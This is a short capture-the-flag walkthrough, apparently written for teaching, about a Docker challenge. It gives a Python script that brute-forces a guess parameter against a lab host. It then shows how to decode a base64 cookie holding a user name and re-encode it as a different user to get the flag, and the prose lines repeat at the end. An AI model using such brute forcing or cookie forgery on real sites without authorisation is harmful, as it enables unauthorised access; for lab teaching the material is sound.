(g) - Python Brute Force

Want to run this Docker container locally?

docker run -d -p 9013:80 --restart always --name flag-g joshbeck2024/ctf-base64-encoded-cookie

Here is the python code that solves the challenge. (Probably don’t want to just hand this one to students!)

import re
import requests
import random

while 1 == 1:
        x = random.randint(1,1000)
        s = 'wrong'
        r = requests.get('<http://172.25.200.200:9013?guess=>' + str(x))
        result= r.text
        if s not in result:
                print(result)

When found, you will be given a new URL with a help sheet.

This time there is a base64 cookie that needs to be changed to find the flag!

We’ll want to:

URL Decode the value
Base64 decode after that

echo 'e3VzZXI6IG5vYm9keX0%3D' | python3 -c "import sys,urllib.parse; print(urllib.parse.unquote(sys.stdin.read().strip()))" | base64 -d

You’ll see that this cookie contains the JSON

{user: nobody}

We need to change `nobody` to `beckywecky`

We can re-encode the cookie like this:

echo -n "{user: beckywecky}" | base64

Want to run this Docker container locally?

Here is the python code that solves the challenge. (Probably don’t want to just hand this one to students!)

When found, you will be given a new URL with a help sheet.

This time there is a base64 cookie that needs to be changed to find the flag!

We’ll want to:

You’ll see that this cookie contains the JSON

We need to change nobody to beckywecky

We can re-encode the cookie like this:

We need to change `nobody` to `beckywecky`